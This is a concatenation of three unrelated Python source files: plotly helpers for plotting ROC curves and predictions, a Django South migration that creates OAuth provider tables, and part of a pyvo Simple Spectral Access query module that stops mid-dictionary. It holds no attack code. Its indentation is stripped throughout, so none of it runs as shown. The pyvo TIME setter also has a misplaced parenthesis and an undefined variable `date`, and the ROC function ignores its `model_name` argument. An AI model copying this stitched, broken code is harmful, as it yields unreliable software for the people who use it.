def plot_roc_auc_curve(dataset, model_name="model", show_plot=True, save_plot=True, save_folder="data"):
# Create traces
fig = go.Figure()
fig = add_roc_auc_curve(fig, dataset, model_name="model")
fig.add_trace(
go.Scatter(
x=[0, 1],
y=[0, 1],
mode="lines",
name="random",
line=dict(color="black", dash="dash"),
)
)
fig = add_square(fig, x0=0, x1=1, y0=0, y1=1)
fig.update_layout(
title="Receiver operating characteristic (ROC) curve",
legend={"itemsizing": "constant"},
)
fig.update_xaxes(title_text="False Positive Rate", range=[-0.05, 1.05])
fig.update_yaxes(title_text="True Positive Rate", range=[-0.05, 1.05])
if show_plot:
fig.show()
if save_plot:
fig.write_html(f"{save_folder}/{model_name}_ROC.html")
def add_square(fig, x0, x1, y0, y1):
fig.add_trace(
go.Scatter(
x=[x0, x1],
y=[y0, y0],
mode="lines",
showlegend=False,
line=dict(color="black", dash="dash", width=1),
)
)
fig.add_trace(
go.Scatter(
x=[x0, x1],
y=[y1, y1],
mode="lines",
showlegend=False,
line=dict(color="black", dash="dash", width=1),
)
)
fig.add_trace(
go.Scatter(
x=[x0, x0],
y=[y0, y1],
mode="lines",
showlegend=False,
line=dict(color="black", dash="dash", width=1),
)
)
fig.add_trace(
go.Scatter(
x=[x1, x1],
y=[y0, y1],
mode="lines",
showlegend=False,
line=dict(color="black", dash="dash", width=1),
)
)
return fig
def plot_predictions(dataset, model_name="model", show_plot=True, save_plot=True, save_folder="data"):
dataset_subset = dataset[["y_true", "y_pred", "y_proba"]].copy()
dataset_subset.sort_values("y_proba", inplace=True)
dataset_subset["correct"] = np.where(
dataset_subset["y_true"] == dataset_subset["y_pred"], "green", "red"
)
nb_false = len(dataset_subset) - sum(dataset_subset["y_true"])
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=list(range(len(dataset_subset))),
y=dataset_subset['y_true'],
marker=dict(color=dataset_subset["correct"]),
mode="markers",
name="True values",
)
)
fig.add_trace(
go.Scatter(
x=list(range(len(dataset_subset))),
y=dataset_subset['y_proba'],
marker=dict(color='grey'),
mode="lines+markers",
name="Predictions",
)
)
fig.add_trace(
go.Scatter(
x=[nb_false - 0.05 * len(dataset_subset), nb_false + 0.05 * len(dataset_subset)],
y=[0, 1],
mode="lines",
name="limit neg/pos",
line=dict(color="black", dash="dash", width=1),
)
)
fig.add_trace(
go.Scatter(
x=[0, len(dataset_subset)],
y=[0.5, 0.5],
mode="lines",
showlegend=False,
line=dict(color="black", dash="dash", width=1),
)
)
fig.update_layout(
title="Predictions and true values",
xaxis_title="Datapoints",
yaxis_title="True values and predictions",
)
if show_plot:
fig.show()
if save_plot:
fig.write_html(f"{save_folder}/{model_name}_predictions.html")
|
<reponame>philipforget/django-oauth-plus<gh_stars>0
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Nonce'
db.create_table(u'oauth_provider_nonce', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('token_key', self.gf('django.db.models.fields.CharField')(max_length=32)),
('consumer_key', self.gf('django.db.models.fields.CharField')(max_length=256)),
('key', self.gf('django.db.models.fields.CharField')(max_length=255)),
('timestamp', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
))
db.send_create_signal(u'oauth_provider', ['Nonce'])
# Adding model 'Scope'
db.create_table(u'oauth_provider_scope', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('url', self.gf('django.db.models.fields.TextField')(max_length=2083)),
('is_readonly', self.gf('django.db.models.fields.BooleanField')(default=True)),
))
db.send_create_signal(u'oauth_provider', ['Scope'])
# Adding model 'Consumer'
db.create_table(u'oauth_provider_consumer', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('key', self.gf('django.db.models.fields.CharField')(max_length=256)),
('secret', self.gf('django.db.models.fields.CharField')(max_length=16, blank=True)),
('status', self.gf('django.db.models.fields.SmallIntegerField')(default=1)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('xauth_allowed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'oauth_provider', ['Consumer'])
# Adding model 'Token'
db.create_table(u'oauth_provider_token', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('key', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('secret', self.gf('django.db.models.fields.CharField')(max_length=16, null=True, blank=True)),
('token_type', self.gf('django.db.models.fields.SmallIntegerField')()),
('timestamp', self.gf('django.db.models.fields.IntegerField')(default=1382642717L)),
('is_approved', self.gf('django.db.models.fields.BooleanField')(default=False)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='oauth_tokens', null=True, to=orm['auth.User'])),
('consumer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['oauth_provider.Consumer'])),
('scope', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['oauth_provider.Scope'], null=True, blank=True)),
('verifier', self.gf('django.db.models.fields.CharField')(max_length=10)),
('callback', self.gf('django.db.models.fields.CharField')(max_length=2083, null=True, blank=True)),
('callback_confirmed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'oauth_provider', ['Token'])
def backwards(self, orm):
# Deleting model 'Nonce'
db.delete_table(u'oauth_provider_nonce')
# Deleting model 'Scope'
db.delete_table(u'oauth_provider_scope')
# Deleting model 'Consumer'
db.delete_table(u'oauth_provider_consumer')
# Deleting model 'Token'
db.delete_table(u'oauth_provider_token')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'oauth_provider.consumer': {
'Meta': {'object_name': 'Consumer'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'xauth_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'oauth_provider.nonce': {
'Meta': {'object_name': 'Nonce'},
'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'token_key': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
u'oauth_provider.scope': {
'Meta': {'object_name': 'Scope'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_readonly': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.TextField', [], {'max_length': '2083'})
},
u'oauth_provider.token': {
'Meta': {'object_name': 'Token'},
'callback': ('django.db.models.fields.CharField', [], {'max_length': '2083', 'null': 'True', 'blank': 'True'}),
'callback_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'consumer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['oauth_provider.Consumer']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'scope': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['oauth_provider.Scope']", 'null': 'True', 'blank': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {'default': '1382642717L'}),
'token_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'oauth_tokens'", 'null': 'True', 'to': u"orm['auth.User']"}),
'verifier': ('django.db.models.fields.CharField', [], {'max_length': '10'})
}
}
complete_apps = ['oauth_provider'] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
A module for searching for spectra in a remote archive.
A Simple Spectral Access (SSA) service allows a client to search for
spectra in an archive whose field of view overlaps with a given cone
on the sky. The service responds to a search query with a table in
which each row represents an image that is available for download.
The columns provide metadata describing each image and one column in
particular provides the image's download URL (also called the *access
reference*, or *acref*). Some SSA services can create spectra
on-the-fly from underlying data (e.g. image cubes); in this case, the
query result is a table of images whose aperture matches the
requested cone and which will be created when accessed via the
download URL.
This module provides an interface for accessing an SSA service. It is
implemented as a specialization of the DAL Query interface.
The ``search()`` function support the simplest and most common types
of queries, returning an SSAResults instance as its results which
represents the matching imagess from the archive. The SSAResults
supports access to and iterations over the individual records; these
are provided as SSARecord instances, which give easy access to key
metadata in the response, such as the position of the spectrum's
aperture, the spectrum format, its frequency range, and its download
URL.
For more complex queries, the SSAQuery class can be helpful which
allows one to build up, tweak, and reuse a query. The SSAService
class can represent a specific service available at a URL endpoint.
"""
from __future__ import print_function, division
import numbers
import re
import sys
from . import query
__all__ = [ "search", "SSAService", "SSAQuery", "SSAResults", "SSARecord" ]
def search(url, pos, size, format='all', **keywords):
"""
submit a simple SSA query that requests spectra overlapping a
Parameters
----------
url : str
the base URL for the SSA service
pos : 2-element sequence of floats
a 2-element seqence giving the ICRS RA and DEC in decimal degrees
size : float
a floating point number giving the diameter of the circular region
in decimal degrees around pos in which to search for spectra.
format : str
the spectral format(s) of interest. "all" (default)
indicates all available formats; "graphic" indicates
graphical images (e.g. jpeg, png, gif; not FITS);
"metadata" indicates that no images should be
returned--only an empty table with complete metadata.
**keywords:
additional parameters can be given via arbitrary
keyword arguments. These can be either standard
parameters (with names drown from the
``SSAQuery.std_parameters`` list) or paramters
custom to the service. Where there is overlap
with the parameters set by the other arguments to
this function, these keywords will override.
Returns
-------
SSAResults
a container holding a table of matching spectrum records
Raises
------
DALServiceError
for errors connecting to or communicating with the service
DALQueryError
if the service responds with an error, including a query syntax error.
See Also
--------
SSAResults
pyvo.dal.query.DALServiceError
pyvo.dal.query.DALQueryError
"""
service = SSAService(url)
return service.search(pos, size, format, **keywords)
class SSAService(query.DALService):
"""
a representation of an SSA service
"""
def __init__(self, baseurl, resmeta=None, version="1.0"):
"""
instantiate an SSA service
Parameters
----------
baseurl : str
the base URL for submitting search queries to the service.
resmeta : dict
an optional dictionary of properties about the service
"""
super(SSAService, self).__init__(baseurl, "ssa", version, resmeta)
def search(self, pos, size, format='all', **keywords):
"""
submit a simple SSA query to this service with the given constraints.
This method is provided for a simple but typical SSA queries. For
more complex queries, one should create an SSAQuery object via
create_query()
Parameters
----------
pos : 2-element tuple of floats
a 2-element tuple giving the ICRS RA and Dec of the
center of the search region in decimal degrees
size : float
a floating point number giving the diameter of the circular region
in decimal degrees around pos in which to search for spectra.
format : str
the spectral format(s) of interest. "all" (default)
indicates all available formats; "graphic" indicates
graphical spectra (e.g. jpeg, png, gif; not FITS);
"metadata" indicates that no spectra should be
returned--only an empty table with complete metadata.
**keywords :
additional parameters can be given via arbitrary
keyword arguments. These can be either standard
parameters (with names drown from the
``SSAQuery.std_parameters`` list) or paramters
custom to the service. Where there is overlap
with the parameters set by the other arguments to
this function, these keywords will override.
Returns
-------
SSAResults
a container holding a table of matching catalog records
Raises
------
DALServiceError
for errors connecting to or communicating with the service
DALQueryError
if the service responds with an error, including a query syntax error
See Also
--------
SSAResults
pyvo.dal.query.DALServiceError
pyvo.dal.query.DALQueryError
"""
q = self.create_query(pos, size, format, **keywords)
return q.execute()
def create_query(self, pos=None, size=None, format=None, **keywords):
"""
create a query object that constraints can be added to and then
executed. The input arguments will initialize the query with the
given values.
Parameters
----------
pos : 2-element tuple of floats
a 2-element tuple giving the ICRS RA and Dec of the
center of the search region in decimal degrees
size : float
a floating point number giving the diameter of the circular region
in decimal degrees around pos in which to search for spectra.
format : str
the image format(s) of interest. "all" indicates
all available formats; "graphic" indicates
graphical images (e.g. jpeg, png, gif; not FITS);
"metadata" indicates that no images should be
returned--only an empty table with complete metadata.
**keywords :
additional parameters can be given via arbitrary
keyword arguments. These can be either standard
parameters (with names drown from the
``SSAQuery.std_parameters`` list) or paramters
custom to the service. Where there is overlap
with the parameters set by the other arguments to
this function, these keywords will override.
Returns
-------
SSAQuery
the query instance
See Also
--------
SSAQuery
"""
q = SSAQuery(self.baseurl, self.version)
if pos is not None: q.pos = pos
if size is not None: q.size = size
if format: q.format = format
for key in keywords.keys():
q.setparam(key, keywords[key])
return q
class SSAQuery(query.DALQuery):
"""
a class for preparing an query to an SSA service. Query constraints
are added via its service type-specific properties and methods. Once
all the constraints are set, one of the various execute() functions
can be called to submit the query and return the results.
The base URL for the query, which controls where the query will be sent
when one of the execute functions is called, is typically set at
construction time; however, it can be updated later via the
:py:attr:`~pyvo.dal.query.DALQuery.baseurl` to send a configured
query to another service.
In addition to the attributes described below, search parameters can be
set generically by name via the
:py:attr:`~pyvo.dal.query.DALQuery.setparam`()
method. The class attribute, ``std_parameters``, list the parameters
defined by the SSA standard.
The typical function for submitting the query is ``execute()``; however,
alternate execute functions provide the response in different forms,
allowing the caller to take greater control of the result processing.
"""
std_parameters = [ "REQUEST", "VERSION", "POS", "SIZE", "BAND", "TIME",
"FORMAT", "APERTURE", "SPECRP", "SPATRES", "TIMERES",
"SNR", "REDSHIFT", "VARAMPL", "TARGETNAME",
"TARGETCLASS", "FLUXCALIB", "WAVECALIB", "PUBID",
"CREATORID", "COLLECTION", "TOP", "MAXREC", "MTIME",
"COMPRESS", "RUNID" ]
def __init__(self, baseurl, version="1.0", request="queryData"):
"""
initialize the query object with a baseurl and request type
"""
super(SSAQuery, self).__init__(baseurl, "ssa", version)
self.setparam("REQUEST", request)
@property
def pos(self):
"""
the position (POS) constraint as a 2-element tuple denoting RA and
declination in decimal degrees. This defaults to None.
"""
return self.getparam("POS")
@pos.setter
def pos(self, pair):
# do a check on the input
if (isinstance(pair, list)):
pair = tuple(pair)
if (isinstance(pair, tuple)):
if len(pair) != 2:
raise ValueError("Wrong number of elements in pos list: " +
str(pair))
if (not isinstance(pair[0], numbers.Number) or
not isinstance(pair[1], numbers.Number)):
raise ValueError("Wrong type of elements in pos list: " +
str(pair))
else:
raise ValueError("pos not a 2-element sequence")
if pair[1] > 90.0 or pair[1] < -90.0:
raise ValueError("pos declination out-of-range: " + str(pair[1]))
while pair[0] < 0:
pair = (pair[0]+360.0, pair[1])
while pair[0] >= 360.0:
pair = (pair[0]-360.0, pair[1])
self.setparam("POS", pair)
@pos.deleter
def pos(self):
self.unsetparam('POS')
@property
def ra(self):
"""
the right ascension part of the position constraint (default: None).
If this is set but dec has not been set yet, dec will be set to 0.0.
"""
if not self.pos: return None
return self.pos[0]
@ra.setter
def ra(self, val):
if not self.pos: self.pos = (0.0, 0.0)
self.pos = (val, self.pos[1])
@property
def dec(self):
"""
the declination part of the position constraint (default: None).
If this is set but ra has not been set yet, ra will be set to 0.0.
"""
if not self.pos: return None
return self.pos[1]
@dec.setter
def dec(self, val):
if not self.pos: self.pos = (0.0, 0.0)
self.pos = (self.pos[0], val)
@property
def size(self):
"""
the diameter of the search region specified in decimal degrees
"""
return self.getparam("SIZE")
@size.setter
def size(self, val):
if val is not None:
if not isinstance(val, numbers.Number):
raise ValueError("size constraint is not a number")
if val <= 0.0 or val > 180.0:
raise ValueError("size constraint out-of-range: " + str(val))
self.setparam("SIZE", val)
@size.deleter
def size(self):
self.unsetparam("SIZE")
@property
def band(self):
"""
the spectral bandpass given in a range-list format in units of
meters
Examples of proper format include:
========================= =====================================
0.20/0.21.5 a wavelength range that includes 21cm
2.7E-7/0.13 a bandpass from optical to radio
========================= =====================================
"""
return self.getparam("BAND")
@band.setter
def band(self, val):
self.setparam("BAND", val)
@band.deleter
def band(self):
self.unsetparam("BAND")
@property
def time(self):
"""
the time coverage given in a range-list format using a restricted
subset of ISO 8601.
Examples of proper format include:
========================= =====================================
2003/2009 covers years 2003-09, inclusive
2003-02/2003-04 covers Feb. through April in 2003
2003-05-02/2010-09-21 covers a range of days
2001-05-02T12:21:30/2010 provides second resolution
========================= =====================================
"""
return self.getparam("TIME")
@time.setter
def time(self, val):
# check the format:
# YYYY-MM-DD, YYYY-MM, YYYY, YYYY-MM-DDTHH:MM:SS
if "/" in val:
dates = val.split("/")
else:
dates = [val]
for _ in dates:
if not(re.match("\d{4}$|\d{4}-\d{2}$|\d{4}-\d{2}-\d{2}$|" +
"\d{4}-\d{2}-\d{2}T\d{2}\:\d{2}\:\d{2}$"), date):
raise ValueError("time format not valid: " + val)
self.setparam("TIME", val)
@time.deleter
def time(self):
self.unsetparam("TIME")
@property
def format(self):
"""
the desired format of the images to be returned. This will be in the
form of a commna-separated list of MIME-types or one of the following
special values.
========= =======================================================
**value** **meaning**
all all formats available
compliant any SSA data model compliant format
native the native project specific format for the spectrum
graphic any of the graphics formats: JPEG, PNG, GIF
votable the SSA VOTable format
fits the SSA-compliant FITS format
xml the SSA native XML serialization
metadata no images requested; only an empty table with fields
properly specified
========= =======================================================
"""
return self.getparam("FORMAT")
@format.setter
def format(self, val):
# check values
formats = val.split(",")
for f in formats:
f = f.lower()
if not query.is_mime_type(f) and \
f not in ["all", "compliant", "native", "graphic", "votable",
"fits", "xml", "metadata"]:
raise ValueError("format type not valid: " + f)
self.setparam("FORMAT", val)
@format.deleter
def format(self):
self.unsetparam("FORMAT")
def execute(self):
"""
submit the query and return the results as a Results subclass instance.
This implimentation returns an SSAResults instance
Returns
-------
SSAResults
a container holding a table of matching catalog records
Raises
------
DALServiceError
for errors connecting to or communicating with the service
DALQueryError
if the service responds with an error, including a query syntax error
See Also
--------
SSAResults
pyvo.dal.query.DALServiceError
pyvo.dal.query.DALQueryError
"""
return SSAResults(self.execute_votable(), self.getqueryurl())
class SSAResults(query.DALResults):
"""
The list of matching images resulting from a spectrum (SSA) query.
Each record contains a set of metadata that describes an available
spectrum matching the query constraints. The number of records in
the results is available via the :py:attr:`nrecs` attribute or by
passing it to the Python built-in ``len()`` function.
This class supports iterable semantics; thus,
individual records (in the form of
:py:class:`~pyvo.dal.ssa.SSARecord` instances) are typically
accessed by iterating over an ``SSAResults`` instance.
>>> results = pyvo.spectrumsearch(url, pos=[12.24, -13.1], size=0.2)
>>> for spec in results:
... print("{0}: {1}".format(spec.title, spec.getdataurl()))
Alternatively, records can be accessed randomly via
:py:meth:`getrecord` or through a Python Database API (v2)
Cursor (via :py:meth:`~pyvo.dal.query.DALResults.cursor`).
Column-based data access is possible via the
:py:meth:`~pyvo.dal.query.DALResults.getcolumn` method.
``SSAResults`` is essentially a wrapper around an Astropy
:py:mod:`~astropy.io.votable`
:py:class:`~astropy.io.votable.tree.Table` instance where the
columns contain the various metadata describing the spectra.
One can access that VOTable directly via the
:py:attr:`~pyvo.dal.query.DALResults.votable` attribute. Thus,
when one retrieves a whole column via
:py:meth:`~pyvo.dal.query.DALResults.getcolumn`, the result is
a Numpy array. Alternatively, one can manipulate the results
as an Astropy :py:class:`~astropy.table.table.Table` via the
following conversion:
>>> table = results.votable.to_table()
``SSAResults`` supports the array item operator ``[...]`` in a
read-only context. When the argument is numerical, the result
is an
:py:class:`~pyvo.dal.ssa.SSARecord` instance, representing the
record at the position given by the numerical index. If the
argument is a string, it is interpreted as the name of a column,
and the data from the column matching that name is returned as
a Numpy array.
"""
def __init__(self, votable, url=None):
"""
initialize the cursor. This constructor is not typically called
by directly applications; rather an instance is obtained from calling
a SSAQuery's execute().
"""
super(SSAResults, self).__init__(votable, url, "ssa", "1.0")
self._ssacols = {
"ssa:Query.Score": self.fieldname_with_utype("ssa:Query.Score"),
"ssa:Query.Token": self.fieldname_with_utype("ssa:Query.Token"),
"ssa:Association.Type": self.fieldname_with_utype("ssa:Association.Type"),
"ssa:Association.ID": self.fieldname_with_utype("ssa:Association.ID"),
"ssa:Association.Key": self.fieldname_with_utype("ssa:Association.Key"),
"ssa:Access.Reference": self.fieldname_with_utype("ssa:Access.Reference"),
"ssa:Access.Format": self.fieldname_with_utype("ssa:Access.Format"),
"ssa:Access.Size": self.fieldname_with_utype("ssa:Access.Size"),
"ssa:DataModel": self.fieldname_with_utype("ssa:DataModel"),
"ssa:Type": self.fieldname_with_utype("ssa:Type"),
"ssa:Length": self.fieldname_with_utype("ssa:Length"),
"ssa:TimeSI": self.fieldname_with_utype("ssa:TimeSI"),
"ssa:SpectralSI": self.fieldname_with_utype("ssa:SpectralSI"),
"ssa:FluxSI": self.fieldname_with_utype("ssa:FluxSI"),
"ssa:SpectralAxis": self.fieldname_with_utype("ssa:SpectralAxis"),
"ssa:FluxAxis": self.fieldname_with_utype("ssa:FluxAxis"),
"ssa:DataID.Title": self.fieldname_with_utype("ssa:DataID.Title"),
"ssa:DataID.Creator": self.fieldname_with_utype("ssa:DataID.Creator"),
"ssa:DataID.Collection": self.fieldname_with_utype("ssa:DataID.Collection"),
"ssa:DataID.DatasetID": self.fieldname_with_utype("ssa:DataID.DatasetID"),
"ssa:DataID.CreatorDID": self.fieldname_with_utype("ssa:DataID.CreatorDID"),
"ssa:DataID.Date": self.fieldname_with_utype("ssa:DataID.Date"),
"ssa:DataID.Version": self.fieldname_with_utype("ssa:DataID.Version"),
"ssa:DataID.Instrument": self.fieldname_with_utype("ssa:DataID.Instrument"),
"ssa:DataID.Bandpass": self.fieldname_with_utype("ssa:DataID.Bandpass"),
"ssa:DataID.DataSource": self.fieldname_with_utype("ssa:DataID.DataSource"),
"ssa:DataID.CreationType": self.fieldname_with_utype("ssa:DataID.CreationType"),
"ssa:DataID.Logo": self.fieldname_with_utype("ssa:DataID.Logo"),
"ssa:DataID.Contributor": self.fieldname_with_utype("ssa:DataID.Contributor"),
"ssa:Curation.Publisher": self.fieldname_with_utype("ssa:Curation.Publisher"),
"ssa:Curation.PublisherID": self.fieldname_with_utype("ssa:Curation.PublisherID"),
"ssa:Curation.PublisherDID": self.fieldname_with_utype("ssa:Curation.PublisherDID"),
"ssa:Curation.Date": self.fieldname_with_utype("ssa:Curation.Date"),
"ssa:Curation.Version": self.fieldname_with_utype("ssa:Curation.Version"),
"ssa:Curation.Rights": self.fieldname_with_utype("ssa:Curation.Rights"),
"ssa:Curation.Reference": self.fieldname_with_utype("ssa:Curation.Reference"),
"ssa:Curation.Contact.Name": self.fieldname_with_utype("ssa:Curation.Contact.Name"),
"ssa:Curation.Contact.Email": self.fieldname_with_utype("ssa:Curation.Contact.Email"),
"ssa:Target.Name": self.fieldname_with_utype("ssa:Target.Name"),
"ssa:Target.Description": self.fieldname_with_utype("ssa:Target.Description"),
"ssa:Target.Class": self.fieldname_with_utype("ssa:Target.Class"),
"ssa:Target.Pos": self.fieldname_with_utype("ssa:Target.Pos"),
"ssa:Target.SpectralClass": self.fieldname_with_utype("ssa:Target.SpectralClass"),
"ssa:Target.Redshift": self.fieldname_with_utype("ssa:Target.Redshift"),
"ssa:Target.VarAmpl": self.fieldname_with_utype("ssa:Target.VarAmpl"),
"ssa:Derived.SNR": self.fieldname_with_utype("ssa:Derived.SNR"),
"ssa:Derived.Redshift.Value": self.fieldname_with_utype("ssa:Derived.Redshift.Value"),
"ssa:Derived.Redshift.StatError": self.fieldname_with_utype("ssa:Derived.Redshift.StatError"),
"ssa:Derived.Redshift.Confidence": self.fieldname_with_utype("ssa:Derived.Redshift.Confidence"),
"ssa:Derived.VarAmpl": self.fieldname_with_utype("ssa:Derived.VarAmpl"),
"ssa:CoordSys.ID": self.fieldname_with_utype("ssa:CoordSys.ID"),
"ssa:CoordSys.SpaceFrame.Name": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Name"),
"ssa:CoordSys.SpaceFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Ucd"),
"ssa:CoordSys.SpaceFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.RefPos"),
"ssa:CoordSys.SpaceFrame.Equinox": self.fieldname_with_utype("ssa:CoordSys.SpaceFrame.Equinox"),
"ssa:CoordSys.TimeFrame.Name": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Name"),
"ssa:CoordSys.TimeFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Ucd"),
"ssa:CoordSys.TimeFrame.Zero": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.Zero"),
"ssa:CoordSys.TimeFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.TimeFrame.RefPos"),
"ssa:CoordSys.SpectralFrame.Name": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Name"),
"ssa:CoordSys.SpectralFrame.Ucd": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Ucd"),
"ssa:CoordSys.SpectralFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.RefPos"),
"ssa:CoordSys.SpectralFrame.Redshift": self.fieldname_with_utype("ssa:CoordSys.SpectralFrame.Redshift"),
"ssa:CoordSys.RedshiftFrame.Name": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.Name"),
"ssa:CoordSys.RedshiftFrame.DopplerDefinition": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.DopplerDefinition"),
"ssa:CoordSys.RedshiftFrame.RefPos": self.fieldname_with_utype("ssa:CoordSys.RedshiftFrame.RefPos"),
"ssa:Char.SpatialAxis.Name": self.fieldname_with_utype("ssa:Char.SpatialAxis.Name"),
"ssa:Char.SpatialAxis.Ucd": self.fieldname_with_utype("ssa:Char.SpatialAxis.Ucd"),
"ssa:Char.SpatialAxis.Unit": self.fieldname_with_utype("ssa:Char.SpatialAxis.Unit"),
"ssa:Char.SpatialAxis.Coverage.Location.Value": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Location.Value"),
"ssa:Char.SpatialAxis.Coverage.Bounds.Extent": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Bounds.Extent"),
"ssa:Char.SpatialAxis.Coverage.Support.Area": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Support.Area"),
"ssa:Char.SpatialAxis.Coverage.Support.Extent": self.fieldname_with_utype("ssa:Char.SpatialAxis.Coverage.Support.Extent"),
"ssa:Char.SpatialAxis.SamplingPrecision.SampleExtent": self.fieldname_with_utype("ssa:Char.SpatialAxis.SamplingPrecision.SampleExtent"),
"ssa:Char.SpatialAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor": self.fieldname_with_utype("ssa:Char.SpatialAxis.SamplingPrecision.SamplingPrecisionRefVal.FillFactor"),
"ssa:Char.SpatialAxis.Accuracy.StatError": self.fieldname_with_utype("ssa:Char.SpatialAxis.Accuracy.StatError"),
"ssa:Char.SpatialAxis.Accuracy.SysError": self.fieldname_with_utype("ssa:Char.SpatialAxis.Accuracy.SysError"),
